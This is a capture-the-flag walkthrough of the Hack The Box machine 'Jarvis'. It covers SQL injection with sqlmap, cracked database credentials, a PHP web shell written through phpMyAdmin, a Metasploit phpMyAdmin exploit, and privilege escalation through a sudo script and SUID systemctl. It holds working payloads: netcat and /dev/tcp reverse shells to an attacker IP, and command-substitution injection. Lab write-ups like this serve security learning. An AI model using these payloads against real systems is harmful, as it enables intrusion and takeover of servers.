Recon :
As with every box on Hack The Box we start by port scanning the target with nmap.
Let's begin the initial enumeration with a full TCP port scan and check every service that is listening:
nmap -sC -sV -p- jarvis.htb -oA nmap/jarvis-full-ports
-sC : run nmap's default NSE scripts against the open ports
-sV : probe the open ports for service and version information
-p- : scan all 65535 TCP ports instead of nmap's default top 1000
-oA : write the results in all three formats (normal, grepable and XML) using the given base name
Two ports are serving Apache, 80 and 64999. Let's check both, starting with port 80 (we will come back to 64999 as well).
Directories brute forcing :
We will brute force pages and directories on the Apache server on port 80:
Command : gobuster dir -u http://jarvis.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o dir-listing.txt
- -w sets the wordlist to brute force with; here we used a very common one that ships with dirbuster
- -o stores the results in a file, in our case dir-listing.txt
Among the results is an interesting directory, /phpmyadmin, so let's check it!
It is a login page, so we need valid database credentials before we can do anything with it.
SQL Injection :
The site is a hotel booking application, so let's book a room and see what happens.
The room page takes a numeric GET parameter, room.php?cod=5. A quick check for SQL injection is to break the query syntax with a single quote: http://supersecurehotel.htb/room.php?cod='
The picture of the room no longer appears, i.e. the page behaves differently when the query fails, so we very likely have an injection point there.
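To make it clear why the single quote breaks the page and what sqlmap is automating in the next step, here is an added example (written for this writeup, not code from the box) that models room.php with an in-memory SQLite table. The table names, columns and rows are constructed sample data; the real target runs MySQL and sqlmap dumps mysql.user, but the mechanism is identical: the parameter is pasted into the SQL text, so a quote causes a syntax error and a UNION lets us read another table through the same query. The hardened variant casts the parameter and binds it.

```python
import sqlite3

# Constructed sample data standing in for the hotel's rooms and the DBMS user table.
ROOMS = [(1, "Room 1", 100), (2, "Room 2", 120), (5, "Room 5", 200)]
USERS = [("DBadmin", "hashed-secret")]


def make_db():
    """Build a throwaway database so the example runs offline."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        "CREATE TABLE room(cod INTEGER, name TEXT, price INTEGER);"
        "CREATE TABLE user(user TEXT, password TEXT);"
    )
    con.executemany("INSERT INTO room VALUES (?, ?, ?)", ROOMS)
    con.executemany("INSERT INTO user VALUES (?, ?)", USERS)
    return con


def room_vulnerable(con, cod):
    """Hypothetical shape of the room.php query: the GET value is concatenated into SQL."""
    sql = "SELECT name, price FROM room WHERE cod=" + cod
    return con.execute(sql).fetchall()


def probe(con, cod):
    """The manual test from the writeup: does the page still work with this value?"""
    try:
        return "ok", room_vulnerable(con, cod)
    except sqlite3.Error as exc:          # cod=' lands here: broken SQL, blank page
        return "error", str(exc)


def room_safe(con, cod):
    """Hardened version: the value must be an integer and is bound as a parameter."""
    cod_int = int(cod)                    # ValueError for "'" or "5 UNION ..."
    return con.execute("SELECT name, price FROM room WHERE cod=?", (cod_int,)).fetchall()


def probe_safe(con, cod):
    try:
        return "ok", room_safe(con, cod)
    except ValueError:
        return "rejected", None


if __name__ == "__main__":
    db = make_db()
    print(probe(db, "5"))                  # normal booking page
    print(probe(db, "'"))                  # the quote test: query error
    # What sqlmap ends up doing for us: read another table through the same query.
    print(room_vulnerable(db, "5 UNION SELECT user, password FROM user"))
    print(probe_safe(db, "5 UNION SELECT user, password FROM user"))
```

The UNION payload works because the injected SELECT returns the same number of columns as the original; sqlmap finds that count and the injectable column positions automatically before dumping.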
Now let's confirm it with sqlmap and dump the DBMS users' password hashes:
Command : sqlmap --url "http://10.10.10.143/room.php?cod=1" --passwords --dump-all --batch
Username : DBadmin
Password : imissyou
And there we go: sqlmap dumped the database user and cracked its password hash. Let's try these credentials on the phpMyAdmin login page.
We got in :D
Our goal now is to get a reverse shell on the server. We will use two methods for that.
1st method :
We will follow the steps in this article :
We will use an SQL query to write our own PHP web shell into the web root. This only works because the DBadmin account has the FILE privilege, the MySQL process can write to /var/www/html and secure_file_priv does not restrict the output path.
Our query looks like this:
SELECT "<?php system($_GET['comand']); ?>" INTO OUTFILE "/var/www/html/hack3r.php"
We just need to go to the SQL tab in phpMyAdmin and execute it.
And there we go. Check that the file has been created and test our RCE script with a harmless command, e.g. jarvis.htb/hack3r.php?comand=id
Now that we are sure we have command execution on the server, the only thing left is the reverse shell.
We set up a netcat listener on port 443 (nc -lvnp 443).
Then we run this command through the hack3r.php script we created (URL-encode the spaces as %20 if your browser does not do it for you; this also relies on the target's netcat supporting -e, which this one does):
jarvis.htb/hack3r.php?comand=nc -e /bin/bash 10.10.14.36 443
And we got our reverse shell :D
2nd Method :
We will use the authenticated phpMyAdmin local file inclusion that Metasploit chains into RCE (exploit/multi/http/phpmyadmin_lfi_rce, which targets phpMyAdmin 4.8.0 and 4.8.1). It needs the credentials we already have:
msf5 > use exploit/multi/http/phpmyadmin_lfi_rce
set RHOSTS 10.10.10.143
set USERNAME DBadmin
set PASSWORD imissyou
run
Make sure LHOST points at your VPN (tun0) address before running it.
Privilege Escalation :
We run sudo -l to check what www-data may run with sudo, and we found this result:
www-data may run a Python script as the user 'pepper' without a password.
Let us try it and see what we get:
The script asks for input that ends up inside a shell command. Its character filter does not block command substitution, so we supply $("/bin/bash") and the shell spawns bash as pepper while evaluating the command.
After landing as pepper we found ourselves in a restricted shell, so to get a proper interactive shell we sent a second reverse shell back to our machine (this redirection syntax needs bash on the target, which is what we are typing into):
Command : sh -i >& /dev/tcp/10.10.14.36/1234 0>&1
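Why does $(...) slip past a character blacklist? Here is an added example (not the script from the box, whose code the writeup does not show) of a hypothetical "ping helper" that filters a few shell metacharacters and then builds a command line from the user's input. The blacklist, the use of echo instead of ping (so it runs offline) and the function names are all assumptions for illustration. Beside it is the hardened form that validates the input as an IP address and never goes through a shell.

```python
import ipaddress
import subprocess

# Hypothetical blacklist in the spirit of such scripts: it stops "1; id" and "1 | id"
# but says nothing about "$", "(" or ")", so command substitution is still allowed.
FORBIDDEN = ["&", ";", "-", "`", "|"]


def is_forbidden(value):
    """True if the input contains any blacklisted character."""
    return any(ch in value for ch in FORBIDDEN)


def vulnerable_ping(ip):
    """Vulnerable: the filtered string is still interpolated into a shell command.
    'echo ping' stands in for 'ping' so nothing touches the network."""
    if is_forbidden(ip):
        return "rejected"
    # Equivalent to os.system("ping " + ip): the shell parses the whole line,
    # so $(...) inside ip is executed first and its output becomes the argument.
    result = subprocess.run("echo ping " + ip, shell=True,
                            capture_output=True, text=True)
    return result.stdout.strip()


def safe_ping(ip):
    """Hardened: parse the value as an address, then exec without a shell."""
    try:
        addr = ipaddress.ip_address(ip)      # ValueError for anything that is not an IP
    except ValueError:
        return "rejected"
    result = subprocess.run(["echo", "ping", str(addr)],
                            capture_output=True, text=True)
    return result.stdout.strip()


if __name__ == "__main__":
    print(vulnerable_ping("1; id"))            # blacklist catches the semicolon
    print(vulnerable_ping("$(echo pwned)"))    # substitution runs: "ping pwned"
    print(safe_ping("$(echo pwned)"))          # not an IP address: rejected
    print(safe_ping("10.10.14.36"))
```

On the box the substituted command is /bin/bash rather than echo: because the script's stdin and stdout are our terminal, the spawned bash is interactive and runs with the privileges sudo granted to the script.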
And we got the user flag :D
Next we check for SUID binaries (find / -perm -4000 -type f 2>/dev/null).
We found that /bin/systemctl has the SUID bit set, so pepper can run it as root; that is where we will focus.
We will follow this article to exploit the systemctl command :
First we create a service unit of our own whose ExecStart is a reverse shell, then we register it with systemctl link (which symlinks the unit into /etc/systemd/system, so the unit must be given by its full path) and start it. systemd runs the service as root.
And we owned root!
Hope you guys enjoyed our writeup :)
That's it, feedback is appreciated!
Don’t forget to follow on twitter @Taodaiv2
writers : jassem melki & amine fguiri
HTB LINKS:
https://www.hackthebox.eu/profile/151296 https://www.hackthebox.eu/profile/92694
Every respect is appreciated :)
Thanks for reading.